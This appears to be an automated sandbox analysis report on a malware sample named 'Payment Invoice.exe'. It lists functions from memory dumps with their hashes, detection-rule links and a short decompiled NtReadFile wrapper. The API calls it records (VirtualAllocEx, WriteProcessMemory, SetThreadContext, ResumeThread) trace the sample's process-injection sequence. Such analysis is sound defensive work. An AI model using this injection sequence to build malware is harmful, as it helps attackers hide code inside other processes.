Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06E1B7E0

Memory Dump Source

Source File: 00000001.00000002.730676720.0000000006E10000.00000040.00000001.sdmp, Offset: 06E10000, based on PE: false

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 2bc8020239546d9cd785a8abc20b38d151bc091dfcb6c414743d6f9d4b114661
Instruction ID: fd98f96ad26c353d0ee9465ddfa9385508b7afff513558c97b7c4c41a9671c8a
Opcode Fuzzy Hash: 2bc8020239546d9cd785a8abc20b38d151bc091dfcb6c414743d6f9d4b114661
Instruction Fuzzy Hash: 142125759003499FCB50CFAAC884BDEBBF5FF48314F14842AE959A7240C778A954DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 06E1B5B0, Relevance: 1.6, APIs: 1, Instructions: 69threadinjectionCOMMON

Download Yara Rule

APIs

SetThreadContext.KERNELBASE(?,00000000), ref: 06E1B636

Memory Dump Source

Source File: 00000001.00000002.730676720.0000000006E10000.00000040.00000001.sdmp, Offset: 06E10000, based on PE: false

Similarity

API ID: ContextThread
String ID:
API String ID: 1591575202-0
Opcode ID: 26ad05200c8cd1cd906d0f3fb73cd7e79183082f245a23e77912351557b2f9b3
Instruction ID: 9bddcfb8d6cacfc313274e536ad524d1d155641a7c93d1820ffe739f37b2d0ef
Opcode Fuzzy Hash: 26ad05200c8cd1cd906d0f3fb73cd7e79183082f245a23e77912351557b2f9b3
Instruction Fuzzy Hash: F9215971D003088FCB10CFAAC4857EEBBF4EF48224F15842AD559A7641CB789945CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 06E1DE98, Relevance: 1.6, APIs: 1, Instructions: 66COMMON

Download Yara Rule

APIs

EnumChildWindows.USER32(?,00000000,?), ref: 06E1DF18

Memory Dump Source

Source File: 00000001.00000002.730676720.0000000006E10000.00000040.00000001.sdmp, Offset: 06E10000, based on PE: false

Similarity

API ID: ChildEnumWindows
String ID:
API String ID: 3555792229-0
Opcode ID: 43131046fb4a772056227dd96e5f221beb7cb2716467bfad7d6c8d405b8ddf37
Instruction ID: c05ede7d3f49b07223d900ac0a7c1e976952c131188a27855e1770af5df8a64f
Opcode Fuzzy Hash: 43131046fb4a772056227dd96e5f221beb7cb2716467bfad7d6c8d405b8ddf37
Instruction Fuzzy Hash: 14216AB5D002498FCB00CFAAC844BEEFBF5EF88324F14802AE414A7640C774A945DFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00CEE150, Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00CEE1DF

Memory Dump Source

Source File: 00000001.00000002.719045927.0000000000CE0000.00000040.00000001.sdmp, Offset: 00CE0000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 3216255759150a4228e8c9da397fea5f6006fa6536b7fbcd8edba10fa70e4e26
Instruction ID: 09a11c6cc1972821075589430f8197f9bb60cd6925f53ce0dc521726c739e3b0
Opcode Fuzzy Hash: 3216255759150a4228e8c9da397fea5f6006fa6536b7fbcd8edba10fa70e4e26
Instruction Fuzzy Hash: 3F2105B59002599FDB10CFAAD884ADEFFF4FB48324F14801AE914A3311D374A954CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 06E1BF1C, Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

EnumChildWindows.USER32(?,00000000,?), ref: 06E1DF18

Memory Dump Source

Source File: 00000001.00000002.730676720.0000000006E10000.00000040.00000001.sdmp, Offset: 06E10000, based on PE: false

Similarity

API ID: ChildEnumWindows
String ID:
API String ID: 3555792229-0
Opcode ID: dad16d9544f5a8d4b023d0f6e91436f8b18ada79cb4d0e3e9d2ec6ee3a95f474
Instruction ID: 85c1b4ad392a25f691e8b1d6480eccc45d6ac24a709b611fb8b17a37ab50cd73
Opcode Fuzzy Hash: dad16d9544f5a8d4b023d0f6e91436f8b18ada79cb4d0e3e9d2ec6ee3a95f474
Instruction Fuzzy Hash: DD2137B1D002198FDB50CF9AC844BEEFBF5EF88314F14842AE425A7650D778A945CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 06E1D5F8, Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

K32EnumProcesses.KERNEL32(00000000,?,?), ref: 06E1D683

Memory Dump Source

Source File: 00000001.00000002.730676720.0000000006E10000.00000040.00000001.sdmp, Offset: 06E10000, based on PE: false

Similarity

API ID: EnumProcesses
String ID:
API String ID: 84517404-0
Opcode ID: fd14b081770ae855dc8bd51d503ab117bb712a9f6af63de5e1118f0505b0dff4
Instruction ID: 457b019c40de4bd62231770a4eac0fd1a5226d9e43989440e4907757d3c8188e
Opcode Fuzzy Hash: fd14b081770ae855dc8bd51d503ab117bb712a9f6af63de5e1118f0505b0dff4
Instruction Fuzzy Hash: 8621E2B1D102199FCB40CF99D885BEEFBF4BB48314F14822AE918A7640D778A954CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 06E1B5B8, Relevance: 1.6, APIs: 1, Instructions: 63threadinjectionCOMMON

Download Yara Rule

APIs

SetThreadContext.KERNELBASE(?,00000000), ref: 06E1B636

Memory Dump Source

Source File: 00000001.00000002.730676720.0000000006E10000.00000040.00000001.sdmp, Offset: 06E10000, based on PE: false

Similarity

API ID: ContextThread
String ID:
API String ID: 1591575202-0
Opcode ID: 8920a6b2877dd4ab785c565b2b0d7009f264baf822875635f2fc69117482b72c
Instruction ID: 9709ff3e340bf6e6c8aebe94f05fc92729eb2b30983ef86284e69aca1ba72111
Opcode Fuzzy Hash: 8920a6b2877dd4ab785c565b2b0d7009f264baf822875635f2fc69117482b72c
Instruction Fuzzy Hash: 08213871D003088FCB50CFAAC4847EEBBF4EF48228F148429D559A7340CB78A945CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 06E1D600, Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

K32EnumProcesses.KERNEL32(00000000,?,?), ref: 06E1D683

Memory Dump Source

Source File: 00000001.00000002.730676720.0000000006E10000.00000040.00000001.sdmp, Offset: 06E10000, based on PE: false

Similarity

API ID: EnumProcesses
String ID:
API String ID: 84517404-0
Opcode ID: c5517008ec110279214005dd959a0cb46c6711151dd3b79201220cbaf2dc2b44
Instruction ID: ad471b234fb75e68f87026cceb99f5f4990e02d6126bd141fc9515632da9bb03
Opcode Fuzzy Hash: c5517008ec110279214005dd959a0cb46c6711151dd3b79201220cbaf2dc2b44
Instruction Fuzzy Hash: 2F21F0B1D002199FCB00CF9AD885BDEFBF4FB48324F00812AE918A7740D778A954CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00CEE158, Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00CEE1DF

Memory Dump Source

Source File: 00000001.00000002.719045927.0000000000CE0000.00000040.00000001.sdmp, Offset: 00CE0000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 47875b1587997a002f7c67b0004cf5b0a09dad45424294eaf80ac352d0e8c746
Instruction ID: c8ad0942651b42586ea67d0ceb2971d621d83c6a8f677671bf154855132835bc
Opcode Fuzzy Hash: 47875b1587997a002f7c67b0004cf5b0a09dad45424294eaf80ac352d0e8c746
Instruction Fuzzy Hash: EE21D3B59002599FDB10CFAAD884ADEFBF8FB48324F14841AE915B3310D374A954CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 06E1D985, Relevance: 1.6, APIs: 1, Instructions: 59COMMON

Download Yara Rule

APIs

K32EnumProcessModules.KERNEL32(?,?,?,?), ref: 06E1D9FB

Memory Dump Source

Source File: 00000001.00000002.730676720.0000000006E10000.00000040.00000001.sdmp, Offset: 06E10000, based on PE: false

Similarity

API ID: EnumModulesProcess
String ID:
API String ID: 1082081703-0
Opcode ID: c4d8fe412823302e43d232a1cb92badcc244a8a6fc74b66a54d8612043d0ffa7
Instruction ID: 7deff620c764baa5147a7db6751d4d22c152aaa964a52cd8576276415ce52316
Opcode Fuzzy Hash: c4d8fe412823302e43d232a1cb92badcc244a8a6fc74b66a54d8612043d0ffa7
Instruction Fuzzy Hash: 712127759002499FCB10CF9AC884BDEFBF4FF48324F148429E568A7200D378A544DFA1

Uniqueness

Uniqueness Score: -1.00%

Function 06E1B689, Relevance: 1.6, APIs: 1, Instructions: 58memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06E1B6FE

Memory Dump Source

Source File: 00000001.00000002.730676720.0000000006E10000.00000040.00000001.sdmp, Offset: 06E10000, based on PE: false

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: fa7d0aa4fc4eadb8b97465c5059bbc8e8a89005fe5ce070d5d51578407f934fa
Instruction ID: f6b0accbb46e4ade78c725f0f75eb8326a5554408277c72a7600918c3be9674f
Opcode Fuzzy Hash: fa7d0aa4fc4eadb8b97465c5059bbc8e8a89005fe5ce070d5d51578407f934fa
Instruction Fuzzy Hash: F61167728002489FCB10CFA9C844BDEBBF5AF48324F14841AE915A7240C775A554DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 06E1D988, Relevance: 1.6, APIs: 1, Instructions: 57COMMON

Download Yara Rule

APIs

K32EnumProcessModules.KERNEL32(?,?,?,?), ref: 06E1D9FB

Memory Dump Source

Source File: 00000001.00000002.730676720.0000000006E10000.00000040.00000001.sdmp, Offset: 06E10000, based on PE: false

Similarity

API ID: EnumModulesProcess
String ID:
API String ID: 1082081703-0
Opcode ID: 2db62087569af29ba3e4c6a7af003df5841b43859d322511e1eb0f7227879c17
Instruction ID: f3c50ff302d9a1d1750f3c1413453afd3d216ad6920e8e0a13972ee535706a4f
Opcode Fuzzy Hash: 2db62087569af29ba3e4c6a7af003df5841b43859d322511e1eb0f7227879c17
Instruction Fuzzy Hash: 1B21F4B69002499FCB10CF9AC884BDEBBF4FF48324F158429E568A7240D778A545DFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00CEBD18, Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00CEC1F1,00000800,00000000,00000000), ref: 00CEC402

Memory Dump Source

Source File: 00000001.00000002.719045927.0000000000CE0000.00000040.00000001.sdmp, Offset: 00CE0000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 43944ed96c29cb47ec59064fcdf842c3ca8923b20798ea43ba5605a8aec8b323
Instruction ID: cf1b59218ac3e7c28c9e23c321b7a14369f4c9164a10f4ca563df5a0094e1080
Opcode Fuzzy Hash: 43944ed96c29cb47ec59064fcdf842c3ca8923b20798ea43ba5605a8aec8b323
Instruction Fuzzy Hash: 7D1117B69003488FCB10CF9AC484BEEFBF4EB48314F15842AE515B7600C3B5A945CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 00CEC390, Relevance: 1.6, APIs: 1, Instructions: 54libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00CEC1F1,00000800,00000000,00000000), ref: 00CEC402

Memory Dump Source

Source File: 00000001.00000002.719045927.0000000000CE0000.00000040.00000001.sdmp, Offset: 00CE0000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: ab91f39c3ff58fdb7c14d637f20df6dc9aedb15931926ed21575ce90f1c8d88e
Instruction ID: 770b383bfce41dfd7bd4bdeb3171b9fe646022d67b2e61d4ffb3c7590e49fe0d
Opcode Fuzzy Hash: ab91f39c3ff58fdb7c14d637f20df6dc9aedb15931926ed21575ce90f1c8d88e
Instruction Fuzzy Hash: D61106B69002498FCB10CFAAD484AEEFBF4EB48314F14842AD455B7600C3759946CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 06E1B690, Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06E1B6FE

Memory Dump Source

Source File: 00000001.00000002.730676720.0000000006E10000.00000040.00000001.sdmp, Offset: 06E10000, based on PE: false

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 676a8b9cf738445f1a6ef50a60b7014399a3a44395f8babbac79f1c41bfe4e14
Instruction ID: 5b4643086fa65f02804b4d6b4b0e22a79f80a93030d18b1196ef06c276be2189
Opcode Fuzzy Hash: 676a8b9cf738445f1a6ef50a60b7014399a3a44395f8babbac79f1c41bfe4e14
Instruction Fuzzy Hash: 001137769002489FCB10CFAAC844BDFBBF5EF48324F14841AE515A7250C775A954DFA0

Uniqueness

Uniqueness Score: -1.00%

Function 06E1B501, Relevance: 1.6, APIs: 1, Instructions: 52threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 06E1B56A

Memory Dump Source

Source File: 00000001.00000002.730676720.0000000006E10000.00000040.00000001.sdmp, Offset: 06E10000, based on PE: false

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 958836f1ec0de6b71b95e12ed971cc6532b0008f1acac7c746b1175df4c60348
Instruction ID: ccdc143505980c51e140828d194a523413ae16fe1c1a035f714d3ee670224cfd
Opcode Fuzzy Hash: 958836f1ec0de6b71b95e12ed971cc6532b0008f1acac7c746b1175df4c60348
Instruction Fuzzy Hash: 42115871D002488BCB10CFAAD8447DFFBF5EB88328F158429D565A7600C775A944CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 06E1B508, Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 06E1B56A

Memory Dump Source

Source File: 00000001.00000002.730676720.0000000006E10000.00000040.00000001.sdmp, Offset: 06E10000, based on PE: false

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 71963e51a66f467b393dcb69ba61a2635af7870803ab351e97c7ee1e33737def
Instruction ID: 5cfe13f953fe0e19e4a51b27638d2f3d530972d64a9ac80d4977d7ffb1ad079e
Opcode Fuzzy Hash: 71963e51a66f467b393dcb69ba61a2635af7870803ab351e97c7ee1e33737def
Instruction Fuzzy Hash: 95112871D003488BCB10DFAAC4447DEFBF9AB88328F148429D555A7640C775A944CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00CEC109, Relevance: 1.5, APIs: 1, Instructions: 48COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 00CEC176

Memory Dump Source

Source File: 00000001.00000002.719045927.0000000000CE0000.00000040.00000001.sdmp, Offset: 00CE0000, based on PE: false

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 03e3372e674a15ff649c744b04141dbe611e1204dbd5aafc6385199afd007ce4
Instruction ID: 3dd4858ee5928d98f7d25e405f69ac55bb2aaf34b66d608e0f9ec8293be4e9f3
Opcode Fuzzy Hash: 03e3372e674a15ff649c744b04141dbe611e1204dbd5aafc6385199afd007ce4
Instruction Fuzzy Hash: 5E11E2B6C006898EDB10CF9AD484ADEFBF4EB89324F14851AD469B7601C3756546CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00CEC110, Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 00CEC176

Memory Dump Source

Source File: 00000001.00000002.719045927.0000000000CE0000.00000040.00000001.sdmp, Offset: 00CE0000, based on PE: false

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: fd6fa4293001151ee927707dba278211411f94f9c6eb296e32bb1d4932b58b96
Instruction ID: bdfe133b3d9fd2fb784482d74b1c6f38bb9cb660626b9446932b074b01873d3b
Opcode Fuzzy Hash: fd6fa4293001151ee927707dba278211411f94f9c6eb296e32bb1d4932b58b96
Instruction Fuzzy Hash: 9C11C0B68002498BDB10CF9AD884BDEFBF4AB89324F14851AD429B7611D375A546CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00B3D3D8, Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.718566697.0000000000B3D000.00000040.00000001.sdmp, Offset: 00B3D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dd6d95ebc8a7a605b65f8dcaf88fd5cfba09a8eb777ffb17aab0c980008a6071
Instruction ID: db78337a150a6013d0eb867dab5b1101fafeb66f023e4b4755b0c2325bfa72d8
Opcode Fuzzy Hash: dd6d95ebc8a7a605b65f8dcaf88fd5cfba09a8eb777ffb17aab0c980008a6071
Instruction Fuzzy Hash: 78213AB1504200DFDB05CF10E9C0B16BBE5FB98324F34C5A9E9094B30AC336E856CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00B3D4C4, Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.718566697.0000000000B3D000.00000040.00000001.sdmp, Offset: 00B3D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4cf31deb9a91e1e91a46039c269e0c4c26e184dfc1be841b345dc76feb5dd337
Instruction ID: 132cf17c4c8351ea6246cc365c29384f096a10c32997feec10e9d8b161612d1b
Opcode Fuzzy Hash: 4cf31deb9a91e1e91a46039c269e0c4c26e184dfc1be841b345dc76feb5dd337
Instruction Fuzzy Hash: 1A2125B2604240DFDB05DF10E8C0B26BFA5FB98328F35C5A9E9054B206C336E856CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00B4D01C, Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.718635158.0000000000B4D000.00000040.00000001.sdmp, Offset: 00B4D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ca911c01198af1b70170da97567b128c33e352bcbb792630d08da41824b80138
Instruction ID: 2e5866489dd263b22e81a04e11da2032c74ea1deedc3e5c0c3cb7b150bf68b73
Opcode Fuzzy Hash: ca911c01198af1b70170da97567b128c33e352bcbb792630d08da41824b80138
Instruction Fuzzy Hash: 1E21D0B1604240DFCB14CF14D8D4B26BBA5FB88314F24C9ADE9094B346C37AD947DAA1

Uniqueness

Uniqueness Score: -1.00%

Function 00B4D2BC, Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.718635158.0000000000B4D000.00000040.00000001.sdmp, Offset: 00B4D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 50e6fe46e1a87cbdd1c29ddcc88f6b89f49b44f5d34ad1ee736bf527eb6e7871
Instruction ID: f2e29410b35ac2227b48ce42777728239cd287668410bf8915af3bfbcd7ea640
Opcode Fuzzy Hash: 50e6fe46e1a87cbdd1c29ddcc88f6b89f49b44f5d34ad1ee736bf527eb6e7871
Instruction Fuzzy Hash: 7E213AB1608240DFDB04CF14D9C4B2ABBE5FB84724F24C5ADD9494B245C375ED06D6A2

Uniqueness

Uniqueness Score: -1.00%

Function 00B4D006, Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.718635158.0000000000B4D000.00000040.00000001.sdmp, Offset: 00B4D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: faaf8b224598d433ea391edbffc50c977cd2eba39175c5586dc77425b554be93
Instruction ID: b0c2f9a64ed781277ab6faa55b10aabb98b0acab0d5712670597cdeddd34ea5a
Opcode Fuzzy Hash: faaf8b224598d433ea391edbffc50c977cd2eba39175c5586dc77425b554be93
Instruction Fuzzy Hash: D22192755083809FCB02CF14D994B11BFB1EB46314F28C5DAD8458B257C33AD946CB62

Uniqueness

Uniqueness Score: -1.00%

Function 00B3D3D3, Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.718566697.0000000000B3D000.00000040.00000001.sdmp, Offset: 00B3D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: abf9d05837f20679d6678064280a21b40d007861ebc24b3ccb10da70a24719c3
Instruction ID: cb0555e0bb6bb5ce3fb2a9b862e18f7df4b880f485f735255de1582d5808d92d
Opcode Fuzzy Hash: abf9d05837f20679d6678064280a21b40d007861ebc24b3ccb10da70a24719c3
Instruction Fuzzy Hash: 6D11B1B6504280DFCB12CF10E5C4B16BFB1FB94324F28C6A9D8490B716C33AE856CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00B3D4BF, Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.718566697.0000000000B3D000.00000040.00000001.sdmp, Offset: 00B3D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: abf9d05837f20679d6678064280a21b40d007861ebc24b3ccb10da70a24719c3
Instruction ID: 4ecb8227503738fedbeba198f5e223df3db5a7bbd906a500f13db5b1d78293f4
Opcode Fuzzy Hash: abf9d05837f20679d6678064280a21b40d007861ebc24b3ccb10da70a24719c3
Instruction Fuzzy Hash: A511D376504280DFCB12CF10D5C4B16BFB1FB98324F38C6AAD8450B616C336D856CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00B4D2B7, Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.718635158.0000000000B4D000.00000040.00000001.sdmp, Offset: 00B4D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c290966d431b771c232c848e2df3a4f71e4c0d9c3d497cbce964f844d3499f65
Instruction ID: 4032665172af2fe3ff2aeef8e60239c4e05b8acddef5260fb41f535e34f11030
Opcode Fuzzy Hash: c290966d431b771c232c848e2df3a4f71e4c0d9c3d497cbce964f844d3499f65
Instruction Fuzzy Hash: E91106B2504280CFCB11CF14D5C4719FBB1FB85324F28C6AAD8494B646C33AD90ACB92

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00559C5F, Relevance: 2.2, Strings: 1, Instructions: 999COMMON

Download Yara Rule

Strings

B, xrefs: 0055A688

Memory Dump Source

Source File: 00000001.00000002.716578799.00000000004E2000.00000002.00020000.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000001.00000002.716546969.00000000004E0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.717404896.000000000055E000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID: B
API String ID: 0-1255198513
Opcode ID: cceb42a2caf317e1ddfbb7b4876833e4e44d30d70dda64136af7bc503e297288
Instruction ID: b3fdecb442e59d10fd2e98c3c8a6275e0f70c333affef7e8fe558001425fbd57
Opcode Fuzzy Hash: cceb42a2caf317e1ddfbb7b4876833e4e44d30d70dda64136af7bc503e297288
Instruction Fuzzy Hash: ABA2AC6144E3C18FD7578B3488A9541BFB0AE1322476E8ADFC4C5CF4B3E26D588AC762

Uniqueness

Uniqueness Score: -1.00%

Function 0055A067, Relevance: 1.8, Strings: 1, Instructions: 590COMMON

Download Yara Rule

Strings

B, xrefs: 0055A688

Memory Dump Source

Source File: 00000001.00000002.716578799.00000000004E2000.00000002.00020000.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000001.00000002.716546969.00000000004E0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.717404896.000000000055E000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID: B
API String ID: 0-1255198513
Opcode ID: 397d253ee411826cdcd73bed7729ee883a29bb891d5a79a4b984cd12453b8749
Instruction ID: 79786923f12d90e62c426f4aa050f9e63bc890c8947a1a5e74465f90d2f72579
Opcode Fuzzy Hash: 397d253ee411826cdcd73bed7729ee883a29bb891d5a79a4b984cd12453b8749
Instruction Fuzzy Hash: 8342886144E3C28FC7538B7498B5641BFB0AE13225B5E86DBC4C6CF4A3D22D584ADB63

Uniqueness

Uniqueness Score: -1.00%

Function 06E18E28, Relevance: 1.4, Strings: 1, Instructions: 188COMMON

Download Yara Rule

Strings

, xrefs: 06E18F56

Memory Dump Source

Source File: 00000001.00000002.730676720.0000000006E10000.00000040.00000001.sdmp, Offset: 06E10000, based on PE: false

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: ed8c92711f31a1f8cb89a17274766edfa2c8d0fec3e8e35055279ac0ecc7fbef
Instruction ID: fb8f4b162026f257349cd89b45a102dfd302c6a27b531a94e4cd4c3cdfe42627
Opcode Fuzzy Hash: ed8c92711f31a1f8cb89a17274766edfa2c8d0fec3e8e35055279ac0ecc7fbef
Instruction Fuzzy Hash: 9C51E031F042098FCB44DB78D8805AFBBF2EF89215B2586BAE615DB751DB34AC41C791

Uniqueness

Uniqueness Score: -1.00%

Function 06E132C0, Relevance: 1.4, Strings: 1, Instructions: 175COMMON

Download Yara Rule

Strings

, xrefs: 06E133D6

Memory Dump Source

Source File: 00000001.00000002.730676720.0000000006E10000.00000040.00000001.sdmp, Offset: 06E10000, based on PE: false

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 19dee6b585a5ba18c2eb0ffbc99b226aefcf91a77a21601692d07364150dd9e3
Instruction ID: 2745f48efb9601be8142605d441931d75faef563b9c685dcebdb11ca0a82f91d
Opcode Fuzzy Hash: 19dee6b585a5ba18c2eb0ffbc99b226aefcf91a77a21601692d07364150dd9e3
Instruction Fuzzy Hash: B551EE31F002198FCB54CB69D8845AEB7E2EBC8329B18857AE605CB755EB34EC428781

Uniqueness

Uniqueness Score: -1.00%

Function 06E13037, Relevance: .2, Instructions: 188COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.730676720.0000000006E10000.00000040.00000001.sdmp, Offset: 06E10000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: af64d001488f87fae4776a145cb5c37b020e814cd14f42e30f641d122ea78315
Instruction ID: 44f30791bab4ebddc067d88a792256369a82f7f4e9880d62b4c6a474a024e3af
Opcode Fuzzy Hash: af64d001488f87fae4776a145cb5c37b020e814cd14f42e30f641d122ea78315
Instruction Fuzzy Hash: 0D613932F101248FD754EB69DC90B9EB3E3AFC8714F1A8174E4099BB69DA75AC41CB80

Uniqueness

Uniqueness Score: -1.00%

Function 06E14841, Relevance: .1, Instructions: 149COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.730676720.0000000006E10000.00000040.00000001.sdmp, Offset: 06E10000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb898d424fab6c1a463dad3404f26b922d0abe850f4d52a2148f4779e2c97d39
Instruction ID: e2050f0c0ce0d5633fe52c6a73a77bad2b4cdeaaa2353ca8a151c6f12d7dac94
Opcode Fuzzy Hash: fb898d424fab6c1a463dad3404f26b922d0abe850f4d52a2148f4779e2c97d39
Instruction Fuzzy Hash: FE514D70E096489BD748EF7AE94169A7BE3EFC9205F14C67AC1049F268EB740D068B61

Uniqueness

Uniqueness Score: -1.00%

Function 06E14850, Relevance: .1, Instructions: 142COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.730676720.0000000006E10000.00000040.00000001.sdmp, Offset: 06E10000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 86026cd2f334afc505782cea55ab82b07f27a823835052d5a8c18ae21ecfce52
Instruction ID: f4d51cafa4689219abe1f97c246befe1bae2619b3eda4eaee0697159d9c03b44
Opcode Fuzzy Hash: 86026cd2f334afc505782cea55ab82b07f27a823835052d5a8c18ae21ecfce52
Instruction Fuzzy Hash: 9D512E70E056089BD748EF7AE94069A7BE3EFC9305F14C679C104DF268EB785D068B61

Uniqueness

Uniqueness Score: -1.00%

Function 06E1245C, Relevance: .1, Instructions: 90COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.730676720.0000000006E10000.00000040.00000001.sdmp, Offset: 06E10000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: db4fb7cbd58e600caf5eb56a298d8085ccb1acf83e5bbe702a71eb5ade1cce61
Instruction ID: 2337eed6dd59fbfc3b2e8d195109fb939894ef5723a0584b1cc63a7d4bf30897
Opcode Fuzzy Hash: db4fb7cbd58e600caf5eb56a298d8085ccb1acf83e5bbe702a71eb5ade1cce61
Instruction Fuzzy Hash: 9D3134B9E5010E8FDF50CFA9E4819ADF3F1FB08304B00A26AD416EF245DB35A985CB50

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: Payment Invoice.exe PID: 6948 Parent PID: 6860 Payment Invoice.exeCOMMON

Executed Functions

Function 00419FE0, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36
filenativeCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E00419FE0(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
				void* _t18;
				void* _t27;
				intOrPtr* _t28;

				_t13 = _a4;
				_t28 = _a4 + 0xc48;
				E0041AB30(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t6 =  &_a32; // 0x414d42
				_t12 =  &_a8; // 0x414d42
				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36, _a40); // executed
				return _t18;
			}

0x00419fe3
0x00419fef
0x00419ff7
0x0041a002
0x0041a01d
0x0041a025
0x0041a029

APIs

NtReadFile.NTDLL(BMA,5EB6522D,FFFFFFFF,00414A01,?,?,BMA,?,00414A01,FFFFFFFF,5EB6522D,00414D42,?,00000000), ref: 0041A025

Strings

BMA, xrefs: 0041A01D, 0041A024
